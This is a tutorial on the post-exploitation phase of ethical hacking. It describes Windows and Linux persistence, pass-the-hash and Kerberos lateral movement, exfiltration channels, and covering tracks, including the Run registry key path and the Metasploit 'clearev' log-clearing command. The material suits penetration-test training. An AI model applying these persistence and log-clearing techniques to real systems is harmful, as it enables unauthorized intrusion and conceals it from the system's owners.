Ethical Hacking Post-Exploitation and Persistence

After gaining elevated access to a system, an ethical hacker enters the post-exploitation phase. This phase demonstrates what a real attacker would do with control of the compromised system — what data they could steal, how they would maintain long-term access, and how far they could spread through the network. Documenting post-exploitation actions gives the client a clear picture of the full impact of the vulnerability that was exploited.

What Happens After Initial Compromise

A real attacker who gains access to a system does not stop there. They pursue four objectives:

1. Maintain access — Ensure they can return even if the initial vulnerability is patched.
2. Expand access — Move laterally to other systems on the network.
3. Gather intelligence — Find valuable data: credentials, sensitive documents, configuration files.
4. Cover tracks — Remove evidence of their presence to avoid detection.

An ethical hacker simulates all four objectives and documents every action meticulously.

Persistence Mechanisms on Windows

Persistence ensures the attacker retains access even after a reboot or a session timeout. Windows provides many legitimate system features that attackers abuse for persistence.

Registry Run Keys

Windows checks specific registry keys on startup and runs any executables listed there. Adding a malicious executable to these keys causes it to run automatically every time any user logs in:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

This is a common persistence mechanism because it requires only standard user privileges to modify the HKCU hive.

Scheduled Tasks

Windows Task Scheduler runs programs at defined times or triggered by events. An attacker creates a scheduled task that runs their backdoor every hour, at every login, or whenever the network becomes available. Scheduled tasks with SYSTEM privileges are particularly powerful.

Startup Folder

Any shortcut or executable placed in the Windows Startup folder runs when the user logs in. The per-user startup folder requires only standard user rights. The all-users startup folder requires administrator access.

Windows Services

Windows services run in the background continuously, even without a user logged in. An attacker with administrator access creates a new service that runs their backdoor as SYSTEM. Services are harder to spot than startup folder entries and survive reboots reliably.

DLL Side-Loading

By placing a malicious DLL alongside a legitimate application that Windows automatically loads on startup, the attacker ensures their code runs every time the application launches — no new registry entries or scheduled tasks needed.

Persistence Mechanisms on Linux

Cron Jobs

Adding a cron job that downloads and executes a payload from an attacker-controlled server at regular intervals creates persistent access. Even if the malware is detected and removed, the cron job re-downloads and reinstalls it at the next scheduled interval.

SSH Authorized Keys

Linux uses SSH key pairs for passwordless authentication. An attacker adds their public key to ~/.ssh/authorized_keys on the compromised system. They can then SSH back into the system at any time using their matching private key, with no password required — and without needing the original vulnerability to remain unpatched.

Backdoor User Account

With root access, an attacker creates a hidden user account — often named something inconspicuous like "backup" or "monitor" — with a password they control. The account provides persistent access through normal login channels.

Rootkits

A rootkit modifies the operating system itself to hide the attacker's presence. It intercepts system calls and removes the attacker's files, processes, and network connections from the output of tools like ls, ps, and netstat. A system with a rootkit installed appears clean even while under active compromise.

Lateral Movement: Spreading Through the Network

Lateral movement uses the access and credentials gathered on one machine to compromise additional systems on the same network. A single compromised workstation becomes a stepping stone to servers, databases, and domain controllers.

Pass-the-Hash

Credentials harvested from a compromised Windows machine — in the form of NTLM hashes — authenticate to other Windows machines on the network without cracking the underlying password. The attacker moves from machine to machine using the same stolen hash.

Pass-the-Ticket (Kerberos)

In Active Directory environments, authentication uses Kerberos tickets. A compromised machine may hold valid Kerberos tickets in memory. An attacker extracts these tickets and uses them to authenticate to services that the original user had access to — even after the user has logged out.

Remote Service Exploitation

With credentials from one machine, the attacker logs into other machines via RDP (Remote Desktop), SSH, SMB, WinRM, or other remote management protocols. Any machine that shares the same credentials as the compromised machine becomes accessible.

Living off the Land (LotL)

Living off the Land describes using legitimate tools already installed on a system — PowerShell, WMI, PsExec, WMIC — for malicious purposes. Because these are trusted, built-in tools, security software does not flag them. An attacker who uses PowerShell to move laterally looks like an administrator running scripts.

Data Exfiltration

Demonstrating that sensitive data could be exfiltrated is one of the most impactful parts of a penetration test report. Common exfiltration targets include:

• Credential stores and password managers
• Database contents — customer records, financial data, intellectual property
• Configuration files containing API keys, database passwords, and cloud credentials
• Source code repositories
• Executive emails and documents

Exfiltration methods include HTTPS (blends with normal traffic), DNS tunneling (encodes data in DNS queries to bypass data-loss-prevention tools), and cloud storage uploads (using legitimate cloud services like Google Drive or Dropbox, which many organizations do not block).

Covering Tracks

A thorough ethical hacker documents what a real attacker would do to hide their presence. Covering tracks includes:

Clearing Logs

Operating systems keep event logs recording logins, program executions, and system changes. An attacker clears relevant log entries to erase evidence of their activity. On Windows, this includes the Security, Application, and System event logs. On Linux, files like /var/log/auth.log, /var/log/syslog, and the bash history file record attacker actions.

In Metasploit, clearing Windows event logs is a single command:

clearev

Timestomping

Every file has three timestamps: Created, Modified, and Accessed. Forensic investigators use these to establish a timeline of attacker activity. Timestomping changes these timestamps to match existing system files, making malicious files blend into normal system content.

Disabling Logging

More aggressive attackers disable security monitoring tools — stopping antivirus services, disabling Windows Defender, or removing endpoint detection and response (EDR) agents. An ethical hacker tests whether these tools can be disabled and documents the finding.

Post-Exploitation Diagram: The Attacker's Footprint

Think of a burglar who breaks into an office and does not leave immediately:

• They copy a key to come back whenever they want (persistence).
• They find the master key that opens every other office in the building (lateral movement).
• They photograph all the documents in the filing cabinets (data exfiltration).
• They delete the security camera footage of their visit (covering tracks).

An ethical hacker demonstrates each of these steps, proves they were possible, and reports what the organization must do to detect and prevent each one.

Important Note on Ethical Practice

During a real penetration test, every post-exploitation action is performed with explicit written authorization. The ethical hacker documents each step in real time. Before the engagement ends, all backdoors, persistence mechanisms, and test accounts created during the test are removed. The target system is restored to its pre-test state.

Key Points

• Post-exploitation pursues four goals: maintain access, expand access, gather intelligence, and cover tracks.
• Windows persistence mechanisms include registry run keys, scheduled tasks, startup folders, and installed services.
• Linux persistence mechanisms include cron jobs, SSH authorized keys, backdoor accounts, and rootkits.
• Lateral movement uses pass-the-hash, pass-the-ticket, remote services, and living-off-the-land techniques to spread through the network.
• Covering tracks involves clearing logs, timestomping files, and disabling security monitoring.
• All persistence mechanisms created during a test must be removed before the engagement closes.